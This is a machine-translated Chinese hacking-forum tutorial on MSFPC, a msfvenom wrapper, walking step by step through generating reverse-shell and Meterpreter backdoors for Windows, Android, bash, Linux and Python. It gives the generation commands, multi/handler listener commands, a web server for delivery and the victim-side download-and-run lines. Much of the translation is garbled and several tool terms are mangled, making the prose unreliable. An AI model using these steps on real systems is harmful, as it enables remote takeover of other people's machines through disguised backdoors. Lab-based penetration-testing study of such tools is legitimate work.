渗透工具:生成payload的神器(MSFPC)的综合使用教程|附图例

小皮
17230小皮首席执行运营官
2018-11-14 23:44:51
17230 2018-11-14 23:44:51
黑客话题: 渗透测试 msfpc
朋友们好!!
众所周知,在Kali Linux中,MSFvenom-用于生成有效载荷(payload)的工具,也可以作为MSFvenom有效载荷创建器(MSFPC)使用,用于通过msfvenom生成各种“基本”Meterpreter有效载荷。它是完全自动化的,MSFiWOMSOM和Meta SasPIT是最终目标。
MSFvenom Payload Creator(MSFPC)是基于用户的选择来生成多种类型的有效载荷的包装器。这个想法是尽可能简单(只需要一个输入)来产生他们的有效载荷。
语法
msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
创建一个交互式IP模式的有效载荷

让我们用下面的命令创建Windows平台的有效载荷
msfpc Windows
当你将进入上面的命令会自动确定接口:
它的界面应该使用?

eth0, lo wan我们按1eth0然后它将开始产生的载荷,结果给我们以下:
  1. 位置 创建MSF处理文件和Windows MeTrPrter。
  2. 命令要启动运行多处理器自动在metasploit框架。
  3. 命令通过Web服务器的文件传输。

图片:1.1.png


基本msfpc是设计来减少生成的文件不同格式的各种平台有效用户的努力。所以当你将型”msfpc“这将显示所有类型的平台并生成特定格式的文件同样。
语法:msfpc <platform-type> <Lhost IP> <Lport>

图片:1.png




Windows Payload

如果你想生成一个payload得到Meterpreter会话受害者的机器上运行Windows,那么你需要做的是类型如下:
msfpcWindows 192.168.1.109 1234
如果你不提IP,它会自动要求选择界面如上选择443作为默认Lport的。它建立在一个恶意后门EXE格式的。32位架构。然后它会开始产生的载荷,结果给我们以下的详细细节。
  • 创建MSF处理文件和Windows MeTrPTER的位置: ‘/root/windows-meterpreter-staged-reverse-tcp-1234.exe’
  • 命令将运行自动启动多处理器:msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc’
  • 通过Web服务器传送文件的命令:python2 -m SimpleHTTPServer 8080

图片:2.png


现在运行以下命令启动多/处理和文件传输服务器。

msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080

图片:3.png


当受害者将浏览以下网址,请下载并运行exe文件这会给攻击者提供的Meterpreter会话。
HTTP/ / 192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exe
结论: 早期,攻击者使用手动方法通过msfvenom命令生成有效负载,然后使用Metasploit模块“multi/handler”通过计量器会话访问反向连接,并且这种技术非常成功地危及了受害者的机器,尽管使用了UCH时间。但是同样的方法也适用于MSFPC通过MSFvOM生成各种“基本”的Meta预测器有效载荷。

图片:4.png



Android的有效载荷
如果你想生成一个有效载荷得到Meterpreter会话受害者的机器上运行Android,那么所有你需要做的是类型如下:
msfpc apk 192.168.1.109 1234
它建立一个格式为apk的恶意后门。然后它会开始产生的载荷,结果给我们以下细节。
  • Location of MSF handler file and android meterpreter created: ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk’
  • 命令将运行自动启动多处理器:msfconsole -q -r ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc’
  • 通过Web服务器传送文件的命令:python2 -m SimpleHTTPServer 8080

图片:5.png


现在运行以下命令启动多/处理和文件传输服务器。
msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
python2 -m SimpleHTTPServer 8080
当受害者将浏览以下网址,它会问你要安装的应用程序的运行apk文件这会给攻击者提供的Meterpreter会话。
HTTP//192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk

图片:6.jpg


因此,你可以像上面所说的观察,我们的目标机的Meterpreter会话。

图片:8.png





BASH

pro以上的msfpc是,它减少了记忆每个平台格式的压力,我们所需要做的只是按照上面的声明语法,其余的将由msfpc自动管理。假设我想为bash平台创建一个有效负载,然后需要几分钟的msfpc时间来生成bash有效负载。
msfpc bash 192.168.1.109 1234

它建立在一个恶意后门SH的格式。。然后它会开始产生的载荷,结果给我们以下:
  • Location of MSF handler file and bash meterpreter created:‘/root/bash-shell-staged-reverse-tcp-1234.sh.’
  • 命令将运行自动启动多处理器:msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-1234.sh.rc’
  • 通过Web服务器传送文件的命令:python2 -m SimpleHTTPServer 8080

图片:9.png


现在运行以下命令启动多/处理和文件传输服务器。

msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
python2 -m SimpleHTTPServer 8080当受害者将浏览以下网址,它会要求安装脚本,一旦目标运行bash脚本拥有完全权限,这将给命令。

http://192.168.1.109/root/bash-shell-staged-reverse-tcp-1234.sh
chmod 777 bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh

图片:11.png


因此,你可以像上面所说的观察,我们的目标机的shell,用下面的命令我们已经升级到Meterpreter壳的帮助。
sessions -u 1

图片:12.png




Linux

如果你想生成一个有效载荷得到Meterpreter会话受害者的机器上运行Linux,那么所有你需要做的是类型如下:
msfpcLinux 192.168.1.109 4444
它建立一个格式
ELF的恶意后门。然后它会开始产生的载荷,结果给我们以下细节:
  • Location of MSF handler file and Linux shell created: ‘/root/linux-shell-staged-reverse-tcp-4444.elf
  • 命令将运行自动启动多处理器:msfconsole -q -r ‘/root/linux-shell-staged-reverse-tcp-4444.elf.rc’
  • 通过Web服务器传送文件的命令:python2 -m SimpleHTTPServer 8080

现在运行以下命令启动多/处理和文件传输服务器。
msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
python2 -m SimpleHTTPServer 8080


当受害者将浏览以下网址,它会问你要安装的应用程序,一旦目标运行。拥有完全权限的ELF文件,它将给命令。
https://192.168.1.109/root/linux-shell-staged-reverse-tcp-4444.elf
chmod 777 linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf

因此,你可以像上面所说的观察,我们的目标机的shell,用下面的命令我们已经升级到Meterpreter壳的帮助。
sessions -u 1


图片:14.png




Python
如果你想生成一个有效载荷(payload)得到Meterpreter会话受害者的机器上运行Python,那么你需要做的是类型如下:
msfpcPython 192.168.1.109 5555
它建立了一个格式为py的恶意后门。然后它会开始产生的载荷(payload),结果给我们以下详情:
Location of MSF handler file and python meterpreter created:‘/root/python-meterpreter-staged-reverse_tcp-5555.py
命令将运行自动启动多处理器:msfconsole -q -r ‘/root/python-meterpreter-staged-reverse_tcp-5555.py.rc’通过Web服务器传送文件的命令:python2 -m SimpleHTTPServer 8080

图片:16.png


现在运行以下命令启动多/处理和文件传输服务器。

msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
python2 -m SimpleHTTPServer 8080当受害者将浏览以下网址,它会要求安装脚本,一旦目标运行Python脚本,它将给Meterpreter会话。

http://192.168.1.109/root/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py

图片:17.png


因此,你可以像上面所说的观察,我们的目标机的Meterpreter会话

图片:18.png






Batch(生成所有可能的组合的有效载荷)


批处理(batch是最重要的方式,它产生的载荷可能组合为多。如果我们要创建的所有有效载荷可以给Meterpreter会话然后我们可以使用下面的命令在这种情况。
msfpc msf batch eth0
在下面给出的命令你可以观察到在这里已产生的所有可能的类型的有效载荷,可以给Meterpreter会话。虽然其他技术上执行的有效载荷和获得反向连接。

图片:19.png


如果我们要创建的所有有效载荷可以给命令shell会话对目标机就可以使用下面的命令在这种情况。
msfpc cmd batch eth0
在下面给出的命令你可以观察到在这里已产生的所有可能的类型的有效载荷,可以给shell命令。

图片:20.png





Loop(生成每个平台载荷)



Loop也是最重要的方式,它产生在每个有效载荷的类型及其默认值。因此,默认情况下将生成一个有效载荷提供Meterpreter会话而不是命令shell会话。

msfpc verbose loop eth0
在下面给出的命令你可以观察到在这里已产生的所有可能的类型的有效载荷为每个平台可以给Meterpreter会话。虽然其他技术上执行的有效载荷和获得反向连接。

图片:21.png



产生无级负载
我们都知道有两种类型的有效载荷,即鹿和无级默认情况下创建一个阶段的有效载荷。如果你想创建一个无级负载就可以用下面的命令来生成有效载荷命令shell会话或无级Meterpreter会话。
msfpc stagless cmd window 192.168.1.109
msfpc stagless msf window 192.168.1.109
其余的技术上面执行的有效载荷和获得反向连接。

图片:22.png



本文标题:渗透工具:生成payload的神器(MSFPC)的综合使用教程|附图例
本文作者:小皮
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2421.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan